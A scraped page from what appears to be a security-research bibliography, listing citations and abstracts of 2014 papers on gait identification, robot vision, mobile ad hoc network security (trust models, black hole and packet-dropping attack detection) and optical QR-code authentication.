Nandy, A.; Pathak, A.; Chakraborty, P.; Nandi, G.C., "Gait Identification Using Component Based Gait Energy Image Analysis," Signal Propagation and Computer Technology (ICSPCT), 2014 International Conference on, pp.380,385, 12-13 July 2014. doi: 10.1109/ICSPCT.2014.6885005 In the modern era of computer vision technology, gait biometric trait increases the proliferation of human identification in video surveillance situation. This paper intends to discuss the robustness of gait identification irrespective of small fluctuation in subject's walking pattern. The Gait Energy Image (GEI) is computed on silhouette gait sequences obtained from OU-ISIR standard gait database. The advantage of working with GEI is to preserve the shape and motion information into a single averaged gait image with fewer dimensions. The three independent components such as head node, body torso and leg region are separated from subject's GEI in accordance to body segment ratio. The local biometric feature has been computed from the shape centroid to the boundary points of each segment. The normality testing of feature for each region of GEI body frame ascertains the discriminative power of each segment. The similarity measurement between gallery and probe gait energy image has been computed by cosine distance, correlation distance and Jaccard distance. The performance efficiency of different distance based metrics is measured by several error metrics.

Keywords: biometrics (access control); computer vision; gait analysis; image motion analysis; image recognition;image segmentation; video surveillance; GEI body frame region; Jaccard distance; OU-ISIR standard gait database; body segment ratio; body torso; component based gait energy image analysis; computer vision technology; correlation distance; cosine distance; discriminative power; distance based metrics; error metrics; gait biometric trait; gait identification; gallery image; human identification; independent components; leg region; local biometric feature; motion information; normality feature testing; performance efficiency; probe gait energy image; shape centroid; shape preserving; silhouette gait sequences; similarity measurement; single averaged gait image; subject walking pattern; video surveillance situation; Image segmentation; Indexes; Robot sensing systems; Standards; Body Centroid; Body Segmentation; Correlation Distance; Cosine Distance; Euclidean Distance; Gait Energy Image; Human Gait; Jaccard Distance; OU-ISIR Gait Database (ID#: 14-3380)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6885005&isnumber=6884878

 

Pande, D.; Sharma, C.; Upadhyaya, V., "Object Detection And Path Finding Using Monocular vision," Signal Propagation and Computer Technology (ICSPCT), 2014 International Conference on, pp.376,379, 12-13 July 2014. doi: 10.1109/ICSPCT.2014.6885028 This project consists of a prototype of an autonomous robot that picks up the desired object (red can) solely based on camera vision. A robotic clamp and a camera are mounted on it. All the information is transferred wirelessly up to distances of 100 ft. The processing of the image is done on an external computer using software like OpenCV, Python and Microsoft Visual Studio. Using samples and regression analysis, the distance of any pixel and the width of any object can be found. After obstacle detection, a suitable path is chosen. All movement is controlled by PIC microcontroller with the help of RF transmitter-receiver modules. It is best suited for non-textured, flat surfaces with little or no movement in the foreground.

Keywords: collision avoidance; microcontrollers; mobile robots; object detection; regression analysis; robot vision; Microsoft; OpenCV; PIC microcontroller; Python; RF transmitter-receiver modules; autonomous robot; camera vision; monocular vision; object detection; path finding; regression analysis; robotic clamp; visual studio; Clamps; I EEE 802.11 Standards; Portable computers; Radio frequency; Robots; Autonomous robot; Compute Vision; Image processing; Monocular Vision; Path Finding (ID#: 14-3381)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6885028&isnumber=6884878


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Publications of Interest

Publications of Interest


The Publications of Interest section contains bibliographical citations, abstracts if available and links on specific topics and research problems of interest to the Science of Security community.

How recent are these publications?

These bibliographies include recent scholarly research on topics which have been presented or published within the past year. Some represent updates from work presented in previous years, others are new topics.

How are topics selected?

The specific topics are selected from materials that have been peer reviewed and presented at SoS conferences or referenced in current work. The topics are also chosen for their usefulness for current researchers.

How can I submit or suggest a publication?

Researchers willing to share their work are welcome to submit a citation, abstract, and URL for consideration and posting, and to identify additional topics of interest to the community. Researchers are also encouraged to share this request with their colleagues and collaborators.

Submissions and suggestions may be sent to: research (at) securedatabank.net


(ID#:14-3360)


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Ad Hoc Network Security

Ad Hoc Network Security


Because they are dynamic, done over shared wireless facilities, and proliferating, ad hoc networks are an important area for security research. In the first half of 2014, a number of works addressing both vehicle-based ad hoc networks (VANETs) and mobile ad hoc networks (MANETs) have been published. Here is a list of some of these publications of interest.

  • Kumar, Ankit; Sinha, Madhavi, "Overview on Vehicular Ad Hoc Network And Its Security Issues," Computing for Sustainable Global Development (INDIACom), 2014 International Conference on , vol., no., pp.792,797, 5-7 March 2014. Vehicular ad-hoc networks (VANETs) provides infrastructure less, rapidly deployable, self-configurable network connectivity. The network is the collection vehicles interlinked by wireless links and willing to store and forward data for their peers. As vehicles move freely and organize themselves arbitrarily, message routing is done dynamically based on network connectivity. Compared with other ad-hoc networks, VANETs are particularly challenging due to the part of the vehicles' high rate of mobility and the numerous signal-weakening barrier, such as buildings, in their environments. Due to their enormous potential, VANET have gained an increasing attention in both industry and academia. Research activities range from lower layer protocol design to applications and implementation issues. A secure VANET system, while exchanging information should protect the system against unauthorized message injection, message alteration, eavesdropping. The security of VANET is one of the most critical issues because their information transmission is propagated in open access (wireless) environments. A few years back VANET has received increased attention as the potential technology to enhance active and preventive safety on the road, as well as travel comfort Safekeeping and privacy are mandatory in vehicular communications for a grateful acceptance and use of such technology. This paper is an attempt to highlight the problems occurred in Vehicular Ad hoc Networks and security issues.
    Keywords: Authentication; Computer crime; Cryptography; Roads; Safety; Vehicles; Vehicular ad hoc networks; Position based routing; Vehicular ad-hoc networks (VANET); attacks; authentication; availability; confidentiality; data trust; non-repudiation; privacy; security (ID#:14-2011)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6828071&isnumber=6827395
  • Khatri, P., "Using Identity And Trust With Key Management For Achieving Security in Ad hoc Networks," Advance Computing Conference (IACC), 2014 IEEE International , vol., no., pp.271,275, 21-22 Feb. 2014. Communication in Mobile Ad hoc network is done over a shared wireless channel with no Central Authority (CA) to monitor. Responsibility of maintaining the integrity and secrecy of data, nodes in the network are held responsible. To attain the goal of trusted communication in MANET (Mobile Ad hoc Network) lot of approaches using key management has been implemented. This work proposes a composite identity and trust based model (CIDT) which depends on public key, physical identity, and trust of a node which helps in secure data transfer over wireless channels. CIDT is a modified DSR routing protocol for achieving security. Trust Factor of a node along with its key pair and identity is used to authenticate a node in the network. Experience based trust factor (TF) of a node is used to decide the authenticity of a node. A valid certificate is generated for authentic node to carry out the communication in the network. Proposed method works well for self certification scheme of a node in the network.
    Keywords: data communication; mobile ad hoc networks; routing protocols; telecommunication security; wireless channels; MANET; ad hoc networks; central authority; data integrity; data secrecy; experience based trust factor; identity model; key management; mobile ad hoc network; modified DSR routing protocol; physical identity; public key; secure data transfer; security; self certification scheme; shared wireless channel; trust factor ;trust model; trusted communication; wireless channels; Artificial neural networks; Mobile ad hoc networks; Protocols; Public key; Servers; Certificate; MANET; Public key; Secret key; Trust Model (ID#:14-2012)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6779333&isnumber=6779283
  • Yanwei Wang; Yu, F.R.; Tang, H.; Minyi Huang, "A Mean Field Game Theoretic Approach for Security Enhancements in Mobile Ad hoc Networks," Wireless Communications, IEEE Transactions on , vol.13, no.3, pp.1616,1627, March 2014. Game theory can provide a useful tool to study the security problem in mobile ad hoc networks (MANETs). Most of existing works on applying game theories to security only consider two players in the security game model: an attacker and a defender. While this assumption may be valid for a network with centralized administration, it is not realistic in MANETs, where centralized administration is not available. In this paper, using recent advances in mean field game theory, we propose a novel game theoretic approach with multiple players for security in MANETs. The mean field game theory provides a powerful mathematical tool for problems with a large number of players. The proposed scheme can enable an individual node in MANETs to make strategic security defence decisions without centralized administration. In addition, since security defence mechanisms consume precious system resources (e.g., energy), the proposed scheme considers not only the security requirement of MANETs but also the system resources. Moreover, each node in the proposed scheme only needs to know its own state information and the aggregate effect of the other nodes in the MANET. Therefore, the proposed scheme is a fully distributed scheme. Simulation results are presented to illustrate the effectiveness of the proposed scheme.
    Keywords: game theory; mobile ad hoc networks; telecommunication security; MANETs; centralized administration; fully distributed scheme; mathematical tool; mean field game theoretic approach; mobile ad hoc networks; security enhancements; security game model; strategic security defense decisions; system resources; Ad hoc networks; Approximation methods; Equations; Games; Mathematical model; Mobile computing; Security; Mean field game; mobile ad hoc network (MANET); security (ID#:14-2013)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6697928&isnumber=6776574
  • Ajamanickam, V.; Veerappan, D., "Inter cluster communication and rekeying technique for multicast security in mobile ad hoc networks," Information Security, IET , vol.8, no.4, pp.234,239, July 2014. Owing to dynamic topology changes in mobile ad hoc networks (MANETs), nodes have the freedom of movement. This characteristic necessitates the process of rekeying to secure multicast transmission. Furthermore, a secure inter cluster communication technique is also mandatory to improve the performance of multicast transmission. In this paper, we propose an inter cluster communication and rekeying technique for multicast security in MANET. The technique facilitates inter cluster communication by distributing private key shares to the nodes, which is performed by the centralised key manager. By tamper proofing the data using private key share, inter cluster communication is accomplished. Furthermore, the rekeying mechanism is invoked when a node joins the cluster. Our rekeying technique incurs low overhead and computation cost. Our technique is simulated in network simulator tool. The simulation results show the proficiency of our technique.
    Keywords: (not provided) (ID#:14-2014)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6842409&isnumber=6842405
  • Wei, Z.; Tang, H.; Yu, F.R.; Wang, M.; Mason, P., "Security Enhancements for Mobile Ad Hoc Networks with Trust Management Using Uncertain Reasoning," Vehicular Technology, IEEE Transactions on, vol. PP, no.99, pp.1,1, April 2014. The distinctive features of mobile ad hoc networks (MANETs), including dynamic topology and open wireless medium, may lead MANETs suffering from many security vulnerabilities. In this paper, using recent advances in uncertain reasoning originated from artificial intelligence community, we propose a unified trust management scheme that enhances the security in MANETs. In the proposed trust management scheme, the trust model has two components: trust from direct observation and trust from indirect observation. With direct observation from an observer node, the trust value is derived using Bayesian inference, which is a type of uncertain reasoning when the full probability model can be defined. On the other hand, with indirect observation, also called secondhand information that is obtained from neighbor nodes of the observer node, the trust value is derived using the Dempster-Shafer theory, which is another type of uncertain reasoning when the proposition of interest can be derived by an indirect method. Combining these two components in the trust model, we can obtain more accurate trust values of the observed nodes in MANETs. We then evaluate our scheme under the scenario of MANET routing. Extensive simulation results show the effectiveness of the proposed scheme. Specifically, throughput and packet delivery ratio can be improved significantly with slightly increased average endto- end delay and overhead of messages.
    Keywords: Ad hoc networks; Bayes methods; Cognition; Mobile computing; Observers; Routing; Security (ID#:14-2015)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6781620&isnumber=4356907
  • Dhurandher, Sanjay K.; Woungang, Isaac; Traore, Issa, "C-SCAN: An Energy-Efficient Network Layer Security Protocol for Mobile Ad Hoc Networks," Advanced Information Networking and Applications Workshops (WAINA), 2014 28th International Conference on , vol., no., pp.530,535, 13-16 May 2014. This paper continues the investigation of our recently proposed protocol (called E2-SCAN) designed for protecting against network layer attacks in mobile ad hoc networks. The enhancements of the E2-SCAN protocol are twofold: (1) a modified credit strategy for tokens renewal is introduced, and (2) a novel strategy for selecting the routing path, resulting to our so-called Conditional SCAN (CSCAN). Simulation experiments are conducted, establishing the superiority of C-SCAN over E2-SCAN in terms of energy efficiency, where the energy efficiency of a node is defined as the ratio of the amount of energy consumed by the node to the total energy consumed by the network.
    Keywords: AODV; Mobile ad hoc networks (MANETs); credit-based strategy; energy efficiency ;routing; security ;token (ID#:14-2016)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6844691&isnumber=6844560
  • Hui Xia; Zhiping Jia; Sha, E.H.-M., "Research of trust model based on fuzzy theory in mobile ad hoc networks," Information Security, IET , vol.8, no.2, pp.88,103, March 2014. The performance of ad hoc networks depends on the cooperative and trust nature of the distributed nodes. To enhance security in ad hoc networks, it is important to evaluate the trustworthiness of other nodes without central authorities. An information-theoretic framework is presented, to quantitatively measure trust and build a novel trust model (FAPtrust) with multiple trust decision factors. These decision factors are incorporated to reflect trust relationship's complexity and uncertainty in various angles. The weight of these factors is set up using fuzzy analytic hierarchy process theory based on entropy weight method, which makes the model has a better rationality. Moreover, the fuzzy logic rules prediction mechanism is adopted to update a node's trust for future decision-making. As an application of this model, a novel reactive trust-based multicast routing protocol is proposed. This new trusted protocol provides a flexible and feasible approach in routing decision-making, taking into account both the trust constraint and the malicious node detection in multi-agent systems. Comprehensive experiments have been conducted to evaluate the efficiency of trust model and multicast trust enhancement in the improvement of network interaction quality, trust dynamic adaptability, malicious node identification, attack resistance and enhancements of system's security.
    Keywords: analytic hierarchy process; decision making; fuzzy set theory; mobile ad hoc networks; multi-agent systems; multicast protocols; routing protocols; telecommunication security; FAP trust; decision-making; entropy weight method; fuzzy analytic hierarchy process theory; fuzzy logic; fuzzy theory; information-theoretic framework; malicious node detection; mobile ad hoc network security; multi-agent system; multiple trust decision factor; network interaction quality; network trust dynamic adaptability; trust model ; trust-based multicast routing protocol (ID#:14-2017)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6748543&isnumber=6748540
  • Singh, M.P.; Manjul, Manisha; Yadav, Manisha, "Hash based efficient secure routing for network communication," Computing for Sustainable Global Development (INDIACom), 2014 International Conference on , vol., no., pp.881,888, 5-7 March 2014. Mobile ad-hoc networks are a new field in networking because it works as an autonomous network. Application of mobile ad-hoc networks are increasing day by day in recent year now a days. So it important is increasing to provide suitable routing protocol and security from attacker. Mobile ad-hoc network now a days faces many problems such as small bandwidth, energy, security, limited computational and high mobility. The main problem in mobile ad-hoc networks is that wireless networks, Infrastructure wireless networks have larger bandwidth, larger memory, power backup and different routing protocol easily applies. But in case of mobile ad-hoc networks some of these application failed due to mobility and small power backup so it is required such type of routing protocol which is take small energy during the transfer of packet. So we see that still there are many challenging works in mobile ad-hoc networks remained and to research in this area related to routing protocol, security issues, solving energy problem and many more which is feasible to it. Our research most probably will be dedicated to Authentication in mobile ad-hoc network.
    Keywords: Ad hoc networks; Mobile communication; Mobile computing; Routing; Routing protocols; Security; Attack; Mobile Ad-hoc; Security; WLAN (ID#:14-2018)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6828090&isnumber=6827395
  • Biagioni, E., "Ubiquitous Interpersonal Communication over Ad-hoc Networks and the Internet," System Sciences (HICSS), 2014 47th Hawaii International Conference on , vol., no., pp.5144,5153, 6-9 Jan. 2014. The hardware and low-level software in many mobile devices are capable of mobile-to-mobile communication, including ad-hoc 802.11, Bluetooth, and cognitive radios. We have started to leverage this capability to provide interpersonal communication both over infrastructure networks (the Internet), and over ad-hoc and delay-tolerant networks composed of the mobile devices themselves. This network is decentralized in the sense that it can function without any infrastructure, but does take advantage of infrastructure connections when available. All interpersonal communication is encrypted and authenticated so packets may be carried by devices belonging to untrusted others. The decentralized model of security builds a flexible trust network on top of the social network of communicating individuals. This social network can be used to prioritize packets to or from individuals closely related by the social network. Other packets are prioritized to favor packets likely to consume fewer network resources. Each device also has a policy that determines how many packets may be forwarded, with the goal of providing useful interpersonal communications using at most 1% of any given resource on mobile devices. One challenge in a fully decentralized network is routing. Our design uses Rendezvous Points (RPs) and Distributed Hash Tables (DHTs) for delivery over infrastructure networks, and hop-limited broadcast and Delay Tolerant Networking (DTN) within the wireless ad-hoc network.
    Keywords: {Bluetooth; Internet; cognitive radio; cryptography; delay tolerant networks; mobile ad hoc networks; mobile computing; packet radio networks; telecommunication network routing; wireless LAN; Bluetooth; DHT; DTN; Internet; RP;a d-hoc 802.11 networks; authentication; cognitive radio; decentralized model; decentralized network routing; delay tolerant networking; distributed hash tables; encryption; flexible trust network; hop-limited broadcast low-level software; mobile devices; mobile-to-mobile communication; rendezvous points; social network; ubiquitous interpersonal communication; Ad hoc networks; IP networks; Internet; Public key; Receivers; Social network services; Wireless communication; Ad-Hoc Network; Delay-Tolerant Network; Infrastructureless Communication; Interpersonal Communication; Networking Protocol; Priority Mechanism (ID#:14-2019)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6759236&isnumber=6758592
  • Sarma, K.J.; Sharma, R.; Das, R., "A survey of Black hole attack detection in Manet," Issues and Challenges in Intelligent Computing Techniques (ICICT), 2014 International Conference on , vol., no., pp.202,205, 7-8 Feb. 2014. MANET is an infrastructure less, dynamic, decentralised network. Any node can join the network and leave the network at any point of time. Due to its simplicity and flexibility, it is widely used in military communication, emergency communication, academic purpose and mobile conferencing. In MANET there no infrastructure hence each node acts as a host and router. They are connected to each other by Peer-to-peer network. Decentralised means there is nothing like client and server. Each and every node is acted like a client and a server. Due to the dynamic nature of mobile Ad-HOC network it is more vulnerable to attack. Since any node can join or leave the network without any permission the security issues are more challenging than other type of network. One of the major security problems in ad hoc networks called the black hole problem. It occurs when a malicious node referred as black hole joins the network. The black hole conducts its malicious behavior during the process of route discovery. For any received RREQ, the black hole claims having route and propagates a faked RREP. The source node responds to these faked RREPs and sends its data through the received routes once the data is received by the black hole; it is dropped instead of being sent to the desired destination. This paper discusses some of the techniques put forwarded by researchers to detect and prevent Black hole attack in MANET using AODV protocol and based on their flaws a new methodology also have been proposed.
    Keywords: client-server systems; mobile ad hoc networks; network servers; peer-to-peer computing; radiowave propagation; routing protocols; telecommunication security; AODV protocol; MANET; academic purpose; black hole attack detection; client; decentralized network; emergency communication; military communication; mobile ad-hoc network; mobile conferencing; peer-to-peer network; received RREQ; route discovery; security; server; Europe; Mobile communication; Routing protocols; Ad-HOC; Black hole attack; MANET; RREP; RREQ (ID#:14-2020)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6781279&isnumber=6781240
  • Chaudhary, A; Kumar, A; Tiwari, V.N., "A reliable solution against Packet dropping attack due to malicious nodes using fuzzy Logic in MANETs," Optimization, Reliabilty, and Information Technology (ICROIT), 2014 International Conference on , vol., no., pp.178,181, 6-8 Feb. 2014. The recent trend of mobile ad hoc network increases the ability and impregnability of communication between the mobile nodes. Mobile ad Hoc networks are completely free from pre-existing infrastructure or authentication point so that all the present mobile nodes which are want to communicate with each other immediately form the topology and initiates the request for data packets to send or receive. For the security perspective, communication between mobile nodes via wireless links make these networks more susceptible to internal or external attacks because any one can join and move the network at any time. In general, Packet dropping attack through the malicious node (s) is one of the possible attack in the mobile ad hoc network. This paper emphasized to develop an intrusion detection system using fuzzy Logic to detect the packet dropping attack from the mobile ad hoc networks and also remove the malicious nodes in order to save the resources of mobile nodes. For the implementation point of view Qualnet simulator 6.1 and Mamdani fuzzy inference system are used to analyze the results. Simulation results show that our system is more capable to detect the dropping attacks with high positive rate and low false positive.
    Keywords: fuzzy logic; inference mechanisms; mobile ad hoc networks; mobile computing; security of data; MANET; Mamdani fuzzy inference system; Qualnet simulator 6.1;data packets; fuzzy logic; intrusion detection system; malicious nodes; mobile ad hoc network; mobile nodes; packet dropping attack; wireless links; Ad hoc networks; Artificial intelligence; Fuzzy sets; Mobile computing; Reliability engineering; Routing; Fuzzy Logic; Intrusion Detection System (IDS);MANETs Security Issues; Mobile Ad Hoc networks (MANETs);Packet Dropping attack (ID#:14-2021)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6798326&isnumber=6798279
  • Sakharkar, S.M.; Mangrulkar, R.S.; Atique, M., "A survey: A secure routing method for detecting false reports and gray-hole attacks along with Elliptic Curve Cryptography in wireless sensor networks," Electrical, Electronics and Computer Science (SCEECS), 2014 IEEE Students' Conference on , vol., no., pp.1,5, 1-2 March 2014. Wireless Sensor Networks (WSNs) are used in many applications in military, environmental, and health-related areas. These applications often include the monitoring of sensitive information such as enemy movement on the battlefield or the location of personnel in a building. Security is important in WSNs. However, WSNs suffer from many constraints, including low computation capability, small memory, limited energy resources, susceptibility to physical capture, and the use of insecure wireless communication channels. These constraints make security in WSNs a challenge. In this paper, we try to explore security issue in WSN. First, the constraints, security requirements and attacks with their corresponding countermeasures in WSNs are explained. Individual sensor nodes are subject to compromised security. An adversary can inject false reports into the networks via compromised nodes. Furthermore, an adversary can create a Gray hole by compromised nodes. If these two kinds of attacks occur simultaneously in a network, some of the existing methods fail to defend against those attacks. The Ad-hoc On Demand Distance (AODV) Vector scheme for detecting Gray-Hole attack and Statistical En-Route Filtering is used for detecting false report. For increasing security level, the Elliptic Curve Cryptography (ECC) algorithm is used. Simulations results obtain so far reduces energy consumption and also provide greater network security to some extent.
    Keywords: public key cryptography; routing protocols; wireless sensor networks; AODV protocol; Gray hole attack; ad hoc on demand distance vector protocol; elliptic curve cryptography; false report detection; individual sensor nodes; secure routing method; statistical en-route filtering; wireless sensor networks; Base stations; Elliptic curve cryptography; Protocols; Routing; Wireless sensor networks; AODV; ECC; Secure Routing; Security; Statistical En-Route; Wireless Sensor Network (ID#:14-2022)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6804514&isnumber=6804412
  • Turguner, Cansin, "Secure fault tolerance mechanism of wireless Ad-Hoc networks with mobile agents," Signal Processing and Communications Applications Conference (SIU), 2014 22nd , vol., no., pp.1620,1623, 23-25 April 2014. Mobile Ad-Hoc Networks are dynamic and wireless self-organization networks that many mobile nodes connect to each other weakly. To compare with traditional networks, they suffer failures that prevent the system from working properly. Nevertheless, we have to cope with many security issues such as unauthorized attempts, security threats and reliability. Using mobile agents in having low level fault tolerance ad-hoc networks provides fault masking that the users never notice. Mobile agent migration among nodes, choosing an alternative paths autonomous and, having high level fault tolerance provide networks that have low bandwidth and high failure ratio, more reliable. In this paper we declare that mobile agents fault tolerance peculiarity and existing fault tolerance method based on mobile agents. Also in ad-hoc networks that need security precautions behind fault tolerance, we express the new model: Secure Mobil Agent Based Fault Tolerance Model.
    Keywords: Ad hoc networks; Conferences; Erbium; Fault tolerance; Fault tolerant systems; Mobile agents; Signal processing; Ad-Hoc network; fault tolerance; mobile agent; related works; secure communication (ID#:14-2023)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6830555&isnumber=6830164
  • Barani, F., "A hybrid approach for dynamic intrusion detection in ad hoc networks using genetic algorithm and artificial immune system," Intelligent Systems (ICIS), 2014 Iranian Conference on , vol., no., pp.1,6, 4-6 Feb. 2014. Mobile ad hoc network (MANET) is a self-created and self organized network of wireless mobile nodes. Due to special characteristics of these networks, security issue is a difficult task to achieve. Hence, applying current intrusion detection techniques developed for fixed networks is not sufficient for MANETs. In this paper, we proposed an approach based on genetic algorithm (GA) and artificial immune system (AIS), called GAAIS, for dynamic intrusion detection in AODV-based MANETs. GAAIS is able to adapting itself to network topology changes using two updating methods: partial and total. Each normal feature vector extracted from network traffic is represented by a hypersphere with fix radius. A set of spherical detector is generated using NicheMGA algorithm for covering the nonself space. Spherical detectors are used for detecting anomaly in network traffic. The performance of GAAIS is evaluated for detecting several types of routing attacks simulated using the NS2 simulator, such as Flooding, Blackhole, Neighbor, Rushing, and Wormhole. Experimental results show that GAAIS is more efficient in comparison with similar approaches.
    Keywords: artificial immune systems; feature extraction; genetic algorithms; mobile ad hoc networks; security of data ;telecommunication network routing; telecommunication network topology; telecommunication security; telecommunication traffic; AIS; AODV-based MANET; GA;NS2 simulator; Niche MGA algorithm; artificial immune system; blackhole simulator; dynamic intrusion detection technique; flooding simulator; genetic algorithm; mobile ad hoc network; neighbor simulator; network topology; network traffic; normal feature vector extraction; routing attack simulation; rushing simulator; security; spherical detector; wireless mobile node; wormhole simulator; Biological cells; Detectors; Feature extraction; Heuristic algorithms Intrusion detection; Routing protocols; Vectors; Ad hoc network; Artificial immune system; Genetic algorithm; Intrusion detection; Routing attack (ID#:14-2024)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6802607&isnumber=6798982
  • Soleimani, Mohammad Taqi; Kahvand, Mahboubeh, "Defending packet dropping attacks based on dynamic trust model in wireless ad hoc networks," Mediterranean Electrotechnical Conference (MELECON), 2014 17th IEEE , vol., no., pp.362,366, 13-16 April 2014. Rapid advances in wireless ad hoc networks lead to increase their applications in real life. Since wireless ad hoc networks have no centralized infrastructure and management, they are vulnerable to several security threats. Malicious packet dropping is a serious attack against these networks. In this attack, an adversary node tries to drop all or partial received packets instead of forwarding them to the next hop through the path. A dangerous type of this attack is called black hole. In this attack, after absorbing network traffic by the malicious node, it drops all received packets to form a denial of service (DOS) attack. In this paper, a dynamic trust model to defend network against this attack is proposed. In this approach, a node trusts all immediate neighbors initially. Getting feedback from neighbors' behaviors, a node updates the corresponding trust value. The simulation results by NS-2 show that the attack is detected successfully with low false positive probability.
    Keywords: Computers; Conferences; Mobile ad hoc networks; Routing; Routing protocols; Vectors; AODV; Black hole attack; Packet dropping; Security; Trust management; Wireless ad hoc network; reactive routing protocol (ID#:14-2025)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6820561&isnumber=6820492
  • Saini, Vinay Kumar; Kumar, Vivek, "AHP, fuzzy sets and TOPSIS based reliable route selection for MANET," Computing for Sustainable Global Development (INDIACom), 2014 International Conference on, vol., no., pp.24,29, 5-7 March 2014. Route selection is a very sensitive activity for mobile ad-hoc network (MANET) and ranking of multiple routes from source node to destination node can result in effective route selection and can provide many other benefits for better performance and security of MANET. This paper proposes an evaluation model based on analytical hierarchy process (AHP), fuzzy sets and technique for order performance by similarity to ideal solution (TOPSIS) to provide a useful solution for ranking of routes. The proposed model utilizes AHP to acquire criteria weights, fuzzy sets to describe vagueness with linguistic values and triangular fuzzy numbers, and TOPSIS to obtain the final ranking of routes. Final ranking of routes facilitates selection of best and most reliable route and provide alternative options for making a robust Mobile Ad-hoc network. K
    ywords: Fuzzy logic; Fuzzy sets; Mobile ad hoc networks; Pragmatics; Routing; Routing protocols; AHP; Fuzzy sets; MCDM; Manet; TOPSIS (ID#:14-2026)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6828006&isnumber=6827395
  • Sumit, S.; Mitra, D.; Gupta, D., "Proposed Intrusion Detection on ZRP based MANET by effective k-means clustering method of data mining," Optimization, Reliabilty, and Information Technology (ICROIT), 2014 International Conference on , vol., no., pp.156,160, 6-8 Feb. 2014. Mobile Ad-Hoc Networks (MANET) consist of peer-to-peer infrastructure less communicating nodes that are highly dynamic. As a result, routing data becomes more challenging. Ultimately routing protocols for such networks face the challenges of random topology change, nature of the link (symmetric or asymmetric) and power requirement during data transmission. Under such circumstances both, proactive as well as reactive routing are usually inefficient. We consider, zone routing protocol (ZRP) that adds the qualities of the proactive (IARP) and reactive (IERP) protocols. In ZRP, an updated topological map of zone centered on each node, is maintained. Immediate routes are available inside each zone. In order to communicate outside a zone, a route discovery mechanism is employed. The local routing information of the zones helps in this route discovery procedure. In MANET security is always an issue. It is possible that a node can turn malicious and hamper the normal flow of packets in the MANET. In order to overcome such issue we have used a clustering technique to separate the nodes having intrusive behavior from normal behavior. We call this technique as effective k-means clustering which has been motivated from k-means. We propose to implement Intrusion Detection System on each node of the MANET which is using ZRP for packet flow. Then we will use effective k-means to separate the malicious nodes from the network. Thus, our Ad-Hoc network will be free from any malicious activity and normal flow of packets will be possible.
    Keywords: data mining; mobile ad hoc networks; mobile computing; peer-to-peer computing; routing protocols; telecommunication security; K-means clustering method; MANET security; ZRP based MANET; ad-hoc network; clustering technique; data mining; data transmission; intrusion detection system; intrusive behavior; k-means; local routing information; malicious activity; malicious nodes; mobile ad-hoc networks; packet flow; peer-to-peer infrastructure; proactive protocols; random topology; reactive protocols; route discovery mechanism; route discovery procedure; routing data; zone routing protocol; Flowcharts; Mobile ad hoc networks; Mobile computing; Protocols; Routing; IARP; IDS effective k-means clustering; IERP; MANET; ZRP (ID#:14-2027)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6798303&isnumber=6798279

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Adaptive Filtering

Adaptive Filtering


As the power of digital signal processors has increased, adaptive filters are now routinely used in many devices as varied as mobile phones, printers, cameras, power systems, GPS devices and medical monitoring equipment. An adaptive filter uses an optimization algorithm is a system with a linear filter to adjust parameters that have a transfer function controlled by variable parameter. Because of the complexity of the optimization algorithms, most of these adaptive filters are digital filters. They are required for some applications because some parameters of the desired processing operation are not known in advance or are changing. The articles below were published from January through August, 2014.

  • Markman, A; Javidi, B.; Tehranipoor, M., "Photon-Counting Security Tagging and Verification Using Optically Encoded QR Codes," Photonics Journal, IEEE, vol.6, no.1, pp.1,9, Feb. 2014. We propose an optical security method for object authentication using photon-counting encryption implemented with phase encoded QR codes. By combining the full phase double-random-phase encryption with photon-counting imaging method and applying an iterative Huffman coding technique, we are able to encrypt and compress an image containing primary information about the object. This data can then be stored inside of an optically phase encoded QR code for robust read out, decryption, and authentication. The optically encoded QR code is verified by examining the speckle signature of the optical masks using statistical analysis. Optical experimental results are presented to demonstrate the performance of the system. In addition, experiments with a commercial Smartphone to read the optically encoded QR code are presented. To the best of our knowledge, this is the first report on integrating photon-counting security with optically phase encoded QR codes.
    Keywords: Huffman codes; cryptography; image coding; iterative methods; masks; phase coding;p hoton counting; smart phones; speckle; statistical analysis; commercial Smartphone; decryption; full phase double-random-phase encryption image compressing; image encryption; iterative Huffman coding; object authentication; optical masks; optical security method; optically phase encoded QR code; photon-counting encryption; photon-counting imaging; photon-counting security tagging; robust read out; speckle signature; statistical analysis; Adaptive optics; Cryptography; Nonlinear optics; Optical filters; Optical imaging; Optical polarization; Photonics; Optical security and encryption; coherent imaging; photon counting imaging; speckle (ID#:14-2028)
